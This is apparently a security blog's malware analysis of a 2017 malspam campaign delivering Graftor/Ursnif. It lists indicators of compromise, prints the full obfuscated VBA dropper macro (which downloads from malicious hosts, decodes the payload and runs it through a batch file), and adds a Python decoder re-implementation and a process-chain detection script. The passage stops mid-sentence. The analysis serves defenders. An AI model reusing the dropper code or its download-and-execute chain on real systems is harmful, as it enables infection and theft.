{"id":753,"date":"2017-04-05T12:12:22","date_gmt":"2017-04-05T11:12:22","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=753"},"modified":"2017-04-05T12:26:28","modified_gmt":"2017-04-05T11:26:28","slug":"2017-04-03-malspam-leading-to-graftorursnif","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=753","title":{"rendered":"2017-04-03 Malspam leading to Graftor\/Ursnif"},"content":{"rendered":"<p>On Monday an employee received an email with a malicious Word document attached. The document was password-protected; the password 3443 unlocks it, and once opened it asks the user to enable macros. This analysis starts from that point. The infection chain closely matches the one Sophos reported in this <a href=\"http:\/\/nakedsecurity.sophos.com\/2017\/03\/30\/the-scam-that-knows-your-name-and-home-address-heres-what-to-do\" target=\"_blank\">article<\/a>. As in the Sophos test, I was not able to get the payload to generate any callback traffic on my test VM. 
<\/p>\n<p>Based on the Virustotal and Hybrid-Analysis links and the article from Sophos, this falls under the Graftor\/Ursnif family of malware.<\/p>\n<p>As always, the artifacts from this investigation are in my repo <a href=\"http:\/\/github.com\/bloomer1016\/2017-04-03-Malspam-leads-to-Graftor-Ursnif\" target=\"_blank\">here<\/a>.<\/p>\n<p>Indicators of Compromise:<br \/>\n=========================<br \/>\ntruhlarna-macura.cz:80 \/ 95.168.206.199<br \/>\nwww.solidaridadsolar.com:80 \/ 134.0.11.204<br \/>\naemquality.com:80 \/ 50.62.103.1<br \/>\n21.12.44.23 (ICMP)<br \/>\nFallback download URLs found in the macro but not seen in my capture: guamaten.com\/prueba\/logo.gif, prefmaqua.com\/_cusudi\/logo.gif<\/p>\n<p>Artifacts:<br \/>\n==========<br \/>\nFile name: 03167.exe<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp<br \/>\nFile size: 207KB<br \/>\nMD5 hash: 8443bc47a982d6c5761d3182415e48e4<br \/>\nVirustotal: <a href=\"http:\/\/virustotal.com\/en\/file\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689\/analysis\/\" target=\"_blank\">http:\/\/virustotal.com\/en\/file\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689\/analysis\/<\/a><br \/>\nFirst detection: 2017-04-03 10:21:40 UTC<br \/>\nDetection ratio: 8 \/ 61<br \/>\nMalwr: <a href=\"http:\/\/malwr.com\/analysis\/ZmE2YjI1ZTAzNzEzNGMxOWE3MmZiY2JmNWU3ODY0MjA\/\" target=\"_blank\">http:\/\/malwr.com\/analysis\/ZmE2YjI1ZTAzNzEzNGMxOWE3MmZiY2JmNWU3ODY0MjA\/<\/a> and <a href=\"http:\/\/malwr.com\/analysis\/ZTgzY2U4YzMyNTNmNDI3OWFlNzk0ZWM0MWJlMjgzNTc\/\" target=\"_blank\">http:\/\/malwr.com\/analysis\/ZTgzY2U4YzMyNTNmNDI3OWFlNzk0ZWM0MWJlMjgzNTc\/<\/a><br \/>\nHybrid Analysis: <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689?environmentId=100\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689?environmentId=100<\/a><\/p>\n<p>File name: 03167.tmp<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp<br \/>\nFile size: 207KB<br \/>\nMD5 hash: 
0efa064779ccb639a07fc1ae088e04ff<br \/>\nVirustotal: NA<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: NA<\/p>\n<p>File name: 03167.cmd<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp<br \/>\nFile size: 98 bytes<br \/>\nMD5 hash: a27604e68dafb7ceaadd6354d7c82c4a<br \/>\nVirustotal: NA<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: NA<\/p>\n<p>File name: logo[1].gif<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8LBPK0D0<br \/>\nFile size: 207KB<br \/>\nMD5 hash: 0efa064779ccb639a07fc1ae088e04ff<br \/>\nVirustotal: NA<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: NA<\/p>\n<p>File name: fili.exe<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Local\\Dawu<br \/>\nFile size: 612KB<br \/>\nMD5 hash: 7e7229ba9b4047f8471c53e4f8800908<br \/>\nVirustotal: NA<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: NA<\/p>\n<p>File name: id.dat<br \/>\nFile size: 612KB<br \/>\nMD5 hash: 7e7229ba9b4047f8471c53e4f8800908<br \/>\nVirustotal: <a href=\"http:\/\/virustotal.com\/en\/file\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076\/analysis\/\" target=\"_blank\">http:\/\/virustotal.com\/en\/file\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076\/analysis\/<\/a><br \/>\nFirst detection: 2017-04-03 13:57:27 UTC<br \/>\nDetection ratio: 36 \/ 61<br \/>\nMalwr: NA<br \/>\nHybrid Analysis: <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076?environmentId=100\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076?environmentId=100<\/a><\/p>\n<p>Analysis of Malware:<br \/>\n====================<br \/>\nAs mentioned above, the user received the email below, which carried a Word document encrypted with a password. The encryption is there to defeat sandbox analysis: an automated sandbox that is not given the password never gets to see the macro. 
<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Email.png\" alt=\"\" width=\"503\" height=\"401\" class=\"aligncenter size-full wp-image-766\" \/><\/a><\/p>\n<p>Once the document is opened and macros are enabled, Word displays a message for a few seconds saying that it is checking the status of the SSL certificate. After that we get the same pop-up Sophos described: the file is corrupted and cannot be opened. Clicking &#8220;OK&#8221; closes Word. The average user would think nothing of this, but what happens a minute or so later hints that something nefarious stemmed from the document: a Windows dialog reports that the process &#8220;0484A.exe has stopped working,&#8221; as seen below. (That name comes from GetTempFileName and differs from run to run; in the run recorded in the artifacts above it was 03167.exe.)<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Stopped.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Stopped.png\" alt=\"\" width=\"500\" height=\"241\" class=\"aligncenter size-full wp-image-761\" \/><\/a><\/p>\n<p>Starting from the network side of this infection, once the macro runs there is an HTTP request to truhlarna-macura[.]cz for a GIF file.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/GIF_Download.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/GIF_Download.png\" alt=\"\" width=\"2506\" height=\"1136\" class=\"aligncenter size-full wp-image-757\" \/><\/a><\/p>\n<p>Looking at the response, the supposed GIF is 207114 bytes, which matches the cached logo[1].gif and, near enough, the two binaries dropped to the user&#8217;s Temp directory: 03167.tmp has the same MD5 as logo[1].gif and is the raw download, while 03167.exe is the decoded payload. 
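<\/p>\n<p>The macro reproduced later in this post explains why those sizes line up: its ejynebe routine treats bytes 10 through 265 of the download as a 256-byte XOR key and decodes everything from offset 266 on, so a 207114-byte download yields a 206848-byte executable, and its acuzamu routine decodes every string literal through a 95-character substitution table. Below is an added Python re-implementation of both routines; it is not code from the original post or its repo. The GIF89a header bytes in the constructed sample are an assumption, since the post does not show the first bytes of the real file, and wrap_payload simply inverts the macro routine to build that sample.<\/p>

```python
# Added example (not from the original post or its repo): the two decoding
# routines of the Word macro, re-implemented in Python 3 so the obfuscated
# strings and the downloaded logo.gif can be decoded offline.

# Substitution alphabet of acuzamu(), copied from the macro as byte values so
# that its quote, backslash and angle-bracket entries need no escaping.
# Entry i is the plaintext for an obfuscated character with ASCII code 32 + i
# (the macro stores it as begozat(i + 32) and indexes with Asc(char)).
ALPHABET = bytes([
    120, 122, 46, 126, 94, 55, 59, 62, 111, 100, 45, 68, 70, 32, 41, 125,
    117, 83, 49, 91, 61, 99, 85, 96, 109, 71, 87, 105, 115, 51, 77, 84,
    52, 123, 78, 37, 57, 90, 113, 50, 47, 69, 119, 40, 38, 43, 118, 107,
    86, 58, 108, 92, 33, 104, 75, 112, 56, 102, 67, 79, 65, 82, 54, 63,
    48, 124, 110, 89, 98, 73, 95, 76, 116, 80, 66, 39, 72, 60, 81, 36,
    88, 121, 34, 97, 74, 64, 103, 35, 106, 53, 93, 44, 42, 114, 101,
]).decode('ascii')

QUOTE = chr(34)  # VBA writes a literal quote as two quotes inside a string

KEY_OFFSET = 10                            # ejynebe copies bytes 10..265 into its key
KEY_LENGTH = 256                           # the key index wraps when it reaches 256
PAYLOAD_OFFSET = KEY_OFFSET + KEY_LENGTH   # XOR-encoded executable starts at byte 266


def acuzamu(encoded):
    '''Decode one obfuscated string: a one-to-one table lookup per character.'''
    return ''.join(ALPHABET[ord(c) - 32] for c in encoded)


def ejynebe(blob):
    '''Carve the executable out of the fake GIF with its embedded XOR key.'''
    if not blob[PAYLOAD_OFFSET:]:
        raise ValueError('download too short to hold a key and a payload')
    key = blob[KEY_OFFSET:PAYLOAD_OFFSET]
    return bytes(b ^ key[i % KEY_LENGTH] for i, b in enumerate(blob[PAYLOAD_OFFSET:]))


def decoded_size(download_size):
    '''Size of the carved binary for a download of the given size.'''
    return download_size - PAYLOAD_OFFSET


def looks_like_pe(data):
    '''Sanity check on the carve: a Windows executable starts with MZ.'''
    return data[:2] == b'MZ'


def wrap_payload(payload, key, header=b'GIF89a' + bytes(4)):
    '''Inverse of ejynebe, used here only to build a constructed sample.
    The post does not show how the server packs logo.gif or what its first
    ten bytes are; the GIF89a header is an assumption for the example.'''
    if len(key) != KEY_LENGTH or len(header) != KEY_OFFSET:
        raise ValueError('key must be 256 bytes and header 10 bytes')
    return header + key + bytes(b ^ key[i % KEY_LENGTH] for i, b in enumerate(payload))


if __name__ == '__main__':
    for s in ('P~})sbs', 'ZU~5O-11g-5~}h;Y;5sh~' + QUOTE, 'I}}(}', '~ ~', '58)'):
        print(repr(s), 'decodes to', repr(acuzamu(s)))
    print('a 207114-byte download carves to', decoded_size(207114), 'bytes')
```

<p>Run ejynebe over logo[1].gif from the repo (MD5 0efa064779ccb639a07fc1ae088e04ff) and the output should match the MD5 listed above for 03167.exe; looks_like_pe is a quick check that the key offset is right before trusting the carve.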
<\/p>\n<p>Next we see an old trick for outlasting sandbox time limits: a single ICMP echo request to 21.12.44.23. The batch file shown below runs it with -n 1 -w 2000, that is one request with a two-second reply timeout, which serves as a crude sleep before the payload is started. The address is in a DoD allocation according to Robtex: http:\/\/www.robtex.com\/?ip=21.12.44.23&amp;whois=1.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nNetRange:\t21.0.0.0 - 21.255.255.255\r\nCIDR:\t21.0.0.0\/8\r\nNetName:\tDNIC-SNET-021\r\nNetHandle:\tNET-21-0-0-0-1\r\nParent:\t()\r\nNetType:\tDirect Allocation\r\nOriginAS:\t\r\nOrganization:\tDoD Network Information Center (DNIC)\r\nRegDate:\t1991-07-01\r\nUpdated:\t2009-06-19\r\nRef:\thttp:\/\/whois.arin.net\/rest\/net\/NET-21-0-0-0-1<\/pre>\n<p>We also see a connection to GitHub, but since it is over TLS I cannot tell what was exchanged.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Github.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Github.png\" alt=\"\" width=\"1108\" height=\"614\" class=\"aligncenter size-full wp-image-758\" \/><\/a><\/p>\n<p>We then see a request to www[.]solidaridadsolar[.]com, which had evidently been cleaned up by the time I ran this on my test VM (and may partly explain why nothing else happened on the VM).<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Dead_Link.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/Dead_Link.png\" alt=\"\" width=\"1143\" height=\"700\" class=\"aligncenter size-full wp-image-755\" \/><\/a><\/p>\n<p>And lastly a request to aemquality[.]com for a file called &#8220;id.dat.&#8221;<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/id_dat.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/id_dat.png\" alt=\"\" width=\"1136\" height=\"697\" class=\"aligncenter size-full wp-image-759\" \/><\/a><\/p>\n<p>From the host side, this was a fairly straightforward infection. When the document is opened with macros enabled, the VBA macro runs and downloads the malicious &#8220;GIF&#8221; (the request shown above). It decodes that download into 03167.exe in the user&#8217;s Temp directory, writes a three-line batch file, 03167.cmd, alongside it and opens the batch file with ShellExecute, which is why a new CMD process appears under Word. The batch file pings 21.12.44.23 once, as a two-second delay, and then starts 03167.exe:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n@echo off\r\nping 21.12.44.23 -n 1 -w 2000 &gt; NUL\r\nstart C:\\Users\\Bill\\AppData\\Local\\Temp&#092;&#048;3167.exe<\/pre>\n<p>Once 03167.exe is started, it goes through the system looking at various things on the filesystem and in the registry (with a heavy emphasis on registry keys related to certificates). It then drops &#8220;fili.exe&#8221; under C:\\Users\\%username%\\AppData\\Local\\Dawu and executes it. fili.exe likewise inspects the filesystem and registry, and after a short while the chain ends with the crash dialog shown earlier, about a minute after the Word document has closed. From there everything shuts down and no further activity is seen.<\/p>\n<p>Since I was not able to get much further from here, I asked one of my colleagues to take a look and see if he was able to get it to go further. 
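<\/p>\n<p>The chain just described (Word writing a batch file to Temp, a CMD process under Word running it, one timed ping as a delay, then a binary started from Temp) is easy to spot in process-creation telemetry. Below is an added Python example, not from the original post, that runs three such checks over constructed Sysmon Event ID 1 style records. The records, PIDs and install paths are made up for the example; only the field names follow Sysmon.<\/p>

```python
# Added example (not from the original post): flag the maldoc process chain
# described above in process-creation telemetry. Field names follow Sysmon
# Event ID 1 (Image, ParentImage, CommandLine, ProcessId, ParentProcessId);
# the sample records below are constructed for this example, not captured
# from the author's VM.

SEP = chr(92)  # Windows path separator, built with chr() so no escapes are needed


def win_path(*parts):
    '''Join path components with the Windows separator.'''
    return SEP.join(parts)


OFFICE_IMAGES = {'winword.exe', 'excel.exe', 'powerpnt.exe'}
BATCH_EXTENSIONS = ('.cmd', '.bat')
# the AppData, Local, Temp segment of a user profile path, with separators on both ends
USER_TEMP_MARKER = win_path('', 'appdata', 'local', 'temp', '')


def basename(path):
    '''Lower-cased file name of an image path.'''
    return path.rsplit(SEP, 1)[-1].lower()


def in_user_temp(path):
    '''True when a path or command line points into a user Temp directory.'''
    return USER_TEMP_MARKER in path.lower()


def runs_batch_from_temp(command_line):
    '''cmd.exe /c path.cmd, with optional surrounding quotes, path under Temp.'''
    cleaned = command_line.replace(chr(34), '').strip().lower()
    return in_user_temp(cleaned) and cleaned.endswith(BATCH_EXTENSIONS)


def triage(events):
    '''Return (ProcessId, reason) pairs for records matching the chain.'''
    by_pid = {e['ProcessId']: e for e in events}
    findings = []
    for e in events:
        image, parent = basename(e['Image']), basename(e['ParentImage'])
        cmd = e['CommandLine'].lower()
        # 1. Office application spawning cmd.exe to run a batch file out of Temp
        if parent in OFFICE_IMAGES and image == 'cmd.exe' and runs_batch_from_temp(cmd):
            findings.append((e['ProcessId'], 'office app spawned cmd.exe on a batch file in Temp'))
        # 2. One ping with a timeout under cmd.exe: the sleep the batch file uses
        if parent == 'cmd.exe' and image == 'ping.exe' and '-n 1' in cmd and '-w ' in cmd:
            findings.append((e['ProcessId'], 'single timed ping used as a delay'))
        # 3. Binary in Temp started by cmd.exe whose own parent is an Office application
        if parent == 'cmd.exe' and in_user_temp(e['Image']):
            shell = by_pid.get(e['ParentProcessId'])
            grandparent = by_pid.get(shell['ParentProcessId']) if shell else None
            if grandparent and basename(grandparent['Image']) in OFFICE_IMAGES:
                findings.append((e['ProcessId'], 'Temp binary launched via cmd.exe under an Office app'))
    return findings


# Constructed sample telemetry (hypothetical PIDs and install paths).
SYSTEM32 = win_path('C:', 'Windows', 'System32')
TEMP = win_path('C:', 'Users', 'Bill', 'AppData', 'Local', 'Temp')
WINWORD = win_path('C:', 'Program Files (x86)', 'Microsoft Office', 'Office15', 'WINWORD.EXE')
EXPLORER = win_path('C:', 'Windows', 'explorer.exe')
CMD = win_path(SYSTEM32, 'cmd.exe')

SAMPLE_EVENTS = [
    {'ProcessId': 1200, 'ParentProcessId': 900, 'Image': WINWORD, 'ParentImage': EXPLORER,
     'CommandLine': 'WINWORD.EXE /n invoice.doc'},
    {'ProcessId': 1300, 'ParentProcessId': 1200, 'Image': CMD, 'ParentImage': WINWORD,
     'CommandLine': 'cmd.exe /c ' + win_path(TEMP, '03167.cmd')},
    {'ProcessId': 1400, 'ParentProcessId': 1300, 'Image': win_path(SYSTEM32, 'PING.EXE'),
     'ParentImage': CMD, 'CommandLine': 'ping 21.12.44.23 -n 1 -w 2000'},
    {'ProcessId': 1500, 'ParentProcessId': 1300, 'Image': win_path(TEMP, '03167.exe'),
     'ParentImage': CMD, 'CommandLine': win_path(TEMP, '03167.exe')},
    # benign: a user-run batch file outside Temp, launched from Explorer
    {'ProcessId': 1600, 'ParentProcessId': 900, 'Image': CMD, 'ParentImage': EXPLORER,
     'CommandLine': 'cmd.exe /c ' + win_path('C:', 'Tools', 'backup.cmd')},
]


if __name__ == '__main__':
    for pid, reason in triage(SAMPLE_EVENTS):
        print(pid, reason)
```

<p>Feed it the ProcessCreate events of one host over a window wide enough to include the Word process itself; the third check walks parent to grandparent and stays silent if the WINWORD record is missing.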
Thankfully he was, and he also shared a tip I was not aware of: open the encrypted document with its password and save it as a new file with the password removed, as seen below. A password-protected Office document is stored as an OLE container around an encrypted package, so static macro extraction only works once that layer has been stripped.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/saveas.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/04\/saveas.png\" alt=\"\" width=\"1275\" height=\"539\" class=\"aligncenter size-full wp-image-760\" \/><\/a><\/p>\n<p>Once I did that, I was able to get at the script with OfficeMalDoc and extract it (you can also simply unzip the saved document, since the Office Open XML format is a ZIP archive).<\/p>\n<p>Below is the VBA script from the Word document.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nAttribute VB_Name = &quot;ThisDocument&quot;\r\nAttribute VB_Base = &quot;0{00020906-0000-0000-C000-000000000046}&quot;\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = False\r\nAttribute VB_Customizable = True\r\n#If VBA7 And Win64 Then\r\nPrivate Declare PtrSafe Function uhodixi Lib &quot;shell32.dll&quot; Alias &quot;ShellExecuteA&quot; (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong\r\nPrivate Declare PtrSafe Function ocabype Lib &quot;kernel32&quot; Alias &quot;GetTempPathA&quot; (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long\r\nPrivate Declare PtrSafe Function hogezij Lib &quot;kernel32&quot; Alias &quot;GetTempFileNameA&quot; (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As 
Long\r\nPrivate Declare PtrSafe Function egawomy Lib &quot;urlmon&quot; Alias &quot;URLDownloadToFileA&quot; (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long\r\n#Else\r\nPrivate Declare Function uhodixi Lib &quot;shell32.dll&quot; Alias &quot;ShellExecuteA&quot; (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long\r\nPrivate Declare Function ocabype Lib &quot;kernel32&quot; Alias &quot;GetTempPathA&quot; (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long\r\nPrivate Declare Function hogezij Lib &quot;kernel32&quot; Alias &quot;GetTempFileNameA&quot; (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long\r\nPrivate Declare Function egawomy Lib &quot;urlmon&quot; Alias &quot;URLDownloadToFileA&quot; (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\nSub Document_Open()\r\n\r\nDim pupujoh As String\r\nDim neqizuv As String\r\nDim asajuko As Long\r\nDim xeryxeb As Long\r\nDim etopedo As Integer\r\nDim yqaluqe() As Byte\r\nDim qilogyb As Object\r\nDim alugumi As Object\r\n      \r\n#If Win64 Then\r\nDim fysisin As LongLong\r\n#Else\r\nDim fysisin As Long\r\n#End If\r\n\r\nActiveDocument.Content.Delete\r\nActiveDocument.PageSetup.LeftMargin = 240\r\nActiveDocument.PageSetup.TopMargin = 100\r\n\r\nSet myRange = ActiveDocument.Content\r\n\r\nWith myRange.Font\r\n .Name = acuzamu(&quot;P~})sbs&quot;)\r\n .Size = 14\r\nEnd With\r\nActiveDocument.Range.Text = acuzamu(&quot;ZU~5O-11g-5~}h;Y;5sh~&quot;&quot;&quot;) &amp; vbLf &amp; 
acuzamu(&quot;-----iR~s&lt;~-Js;h&quot;&quot;&quot;&quot;&quot;&quot;&quot;)\r\n\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\nDoEvents\r\n\r\npupujoh = esecana\r\nasajuko = egawomy(0, acuzamu(&quot;UhhWQHHh}0URs}bs*8s50}s&quot;&quot;5!H;8vHR(v(&quot;&quot;v;Y&quot;), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\n\r\nIf asajuko &lt;&gt; 0 And xeryxeb &lt; 183927 Then\r\nasajuko = egawomy(0, acuzamu(&quot;UhhWQHHv0s8sh~b&quot;&quot;5(8HW}0~dsHR(v(&quot;&quot;v;Y&quot;), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\nEnd If\r\n\r\nIf asajuko &lt;&gt; 0 And xeryxeb &lt; 175274 Then\r\nasajuko = egawomy(0, acuzamu(&quot;UhhWQHHW}~Y8sF0s&quot;&quot;5(8Hf50&lt;0);HR(v(&quot;&quot;v;Y&quot;), pupujoh, 0, 0)\r\nxeryxeb = FileLen(pupujoh)\r\nEnd If\r\n\r\nIf xeryxeb &lt; 179218 Then\r\nActiveDocument.Content.Delete\r\nMsgBox acuzamu(&quot;B(-;bh~}b~h-s55~&lt;&lt;&quot;&quot;-?0}b-(YY-sbq-Y;}~JsRR-(}-sbh;*N;}0&lt;-&lt;(YhJs}~-sb)-h}q-svs;b&quot;&quot;&quot;), vbCritical, acuzamu(&quot;I}}(}&quot;)\r\nApplication.Quit SaveChanges:=0\r\nExit Sub\r\nEnd If\r\n\r\netopedo = FreeFile\r\nOpen pupujoh For Binary As #etopedo\r\nReDim yqaluqe(0 To LOF(etopedo) - 1)\r\nGet #etopedo, , yqaluqe()\r\nClose #etopedo\r\n  \r\nCall ejynebe(yqaluqe())\r\n\r\npupujoh = Left(pupujoh, Len(pupujoh) - 3)\r\npupujoh = pupujoh &amp; acuzamu(&quot;~ ~&quot;)\r\n\r\nneqizuv = Left(pupujoh, Len(pupujoh) - 3)\r\nneqizuv = neqizuv &amp; acuzamu(&quot;58)&quot;)\r\n\r\netopedo = FreeFile\r\nOpen pupujoh For Binary As #etopedo\r\nPut #etopedo, , yqaluqe()\r\nClose #etopedo\r\n \r\nActiveDocument.Content.Delete\r\nMsgBox acuzamu(&quot;?U~-Y;R~-;&lt;-5(}}0Wh~)-sb)-5sbb(h-d~-(W~b~)&quot;), vbCritical, acuzamu(&quot;I}}(}&quot;)\r\n\r\nSet qilogyb = CreateObject(acuzamu(&quot;15};Wh;bv&quot;&quot;,;R~1q&lt;h~8&#x5B;dx~5h&quot;))\r\nSet alugumi = qilogyb.CreateTextFile(neqizuv)\r\nalugumi.WriteLine acuzamu(&quot;u~5U(-(YY&quot;)\r\nalugumi.WriteLine 
acuzamu(&quot;W;bv-G2&quot;&quot;2G&quot;&quot;@@&quot;&quot;G=-*b-2-*J-G```-'-B6g&quot;)\r\nalugumi.WriteLine acuzamu(&quot;&lt;hs}h-&quot;) &amp; pupujoh\r\nalugumi.Close\r\n\r\nfysisin = uhodixi(0, acuzamu(&quot;&#x5B;W~b&quot;), neqizuv, 0, 0, 6)\r\nApplication.Quit SaveChanges:=0\r\nEnd Sub\r\n\r\n\r\nPublic Function esecana() As String\r\n  Dim ezytate As String * 312\r\n  Dim jymyryq As String * 618\r\n  Dim ivecaco As Long\r\n  Dim ymohoba As String\r\n  \r\n  ivecaco = ocabype(312, ezytate)\r\n  If (ivecaco &gt; 0 And ivecaco &lt; 312) Then\r\n    ivecaco = hogezij(ezytate, 0, 0, jymyryq)\r\n    If ivecaco &lt;&gt; 0 Then\r\n        ymohoba = Left$(jymyryq, InStr(jymyryq, vbNullChar) - 1)\r\n    End If\r\n    esecana = ymohoba\r\n  End If\r\nEnd Function\r\n\r\nPublic Sub ejynebe(yqaluqe() As Byte)\r\n  Dim eqoneji As Long\r\n  Dim esyjato As Long\r\n  Dim norixec As Long\r\n  Dim ugagoqo(256) As Byte\r\n  Dim zynebit As Long\r\n  Dim yzetyso As Long\r\n  \r\n   \r\n  esyjato = UBound(yqaluqe) + 1\r\n  \r\n  For eqoneji = 10 To 265\r\n    ugagoqo(eqoneji - 10) = yqaluqe(eqoneji)\r\n  Next\r\n  \r\n  zynebit = UBound(ugagoqo) + 1\r\n  \r\n  yzetyso = 0\r\n  For eqoneji = 266 To (esyjato - 1)\r\n    yqaluqe(eqoneji - 266) = yqaluqe(eqoneji) Xor ugagoqo(yzetyso)\r\n    yzetyso = yzetyso + 1\r\n    \r\n    If yzetyso = (zynebit - 1) Then\r\n        yzetyso = 0\r\n    End If\r\n  Next\r\n  \r\n  ReDim Preserve yqaluqe(esyjato - 267)\r\n  \r\nEnd Sub\r\n\r\nPublic Function acuzamu(ByVal moluhyp As String) As String\r\n  Dim begozat(256)\r\n  Dim abuvuba As String\r\n  Dim ijuhoqe As Long\r\n  Dim korupaj As String\r\n \r\nabuvuba = &quot;xz.~^7;&gt;od-DF )}uS1&#x5B;=cU`mGWis3MT4{N%9Zq2\/Ew(&amp;+vkV:l\\!hKp8fCOAR6?0|nYbI_LtPB'H&lt;Q$Xy&quot;&quot;aJ@g#j5],*re&quot;\r\n  For ijuhoqe = 1 To Len(abuvuba)\r\n  begozat(ijuhoqe + 31) = Mid(abuvuba, ijuhoqe, 1)\r\n  Next ijuhoqe\r\n  \r\n  For ijuhoqe = 1 To Len(moluhyp)\r\n  korupaj = Mid(moluhyp, ijuhoqe, 1)\r\n  
acuzamu = acuzamu &amp; begozat(Asc(korupaj))\r\n  Next ijuhoqe\r\nEnd Function<\/pre>\n<p>Looking at the script, acuzamu is the string decoder: every string literal in the macro is passed through it. It is a plain substitution. The 95-character table abuvuba is loaded into begozat at indices 32 through 126, and each character of an obfuscated string is replaced by the entry at its own ASCII code, so a character with code c comes back as the (c - 31)th character of abuvuba. ejynebe is the payload decoder: it copies bytes 10 through 265 of the downloaded file into a 256-byte key, XORs everything from offset 266 onward against that key (the index wraps at 256) and trims the result, which is how the fake GIF becomes 03167.exe. Note also the two fallback download URLs (guamaten.com and prefmaqua.com) in the decoded strings below; the macro only tries them if the previous download fails, so they did not show up in my capture, but they belong on a block list alongside truhlarna-macura.cz. Unfortunately I was not able to get the strings deobfuscated myself, but my colleague was. Here is what he found:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nVerdana\r\nCheck SSL certificate.\r\n     Please wait...\r\nhttp:\/\/truhlarna-macura.cz\/img\/logo.gif\r\nhttp:\/\/guamaten.com\/prueba\/logo.gif\r\nhttp:\/\/prefmaqua.com\/_cusudi\/logo.gif\r\nNo internet access. Turn off any firewall or anti-virus software and try again.\r\nThe file is corrupted and cannot be opened\r\nScripting.FileSystemObject\r\n@echo off\r\nping 21.12.44.23 -n 1 -w 2000 &gt; NUL\r\nstart\r\nScripting.FileSystemObject<\/pre>\n<p>He also noted that the GIF, once decoded to an executable, makes network connections to some well known sites such as Instagram, GitHub and LinkedIn, which would account for the GitHub connection seen above; we assume this is a connectivity check. Lastly, he noted that &#8220;id.dat&#8221; is another executable. That fits the artifacts above: id.dat and fili.exe have the same MD5, so 03167.exe downloads id.dat from aemquality[.]com and writes it to C:\\Users\\%username%\\AppData\\Local\\Dawu\\fili.exe unchanged, with no decoding step like the one applied to the GIF. When I was writing this up yesterday there was 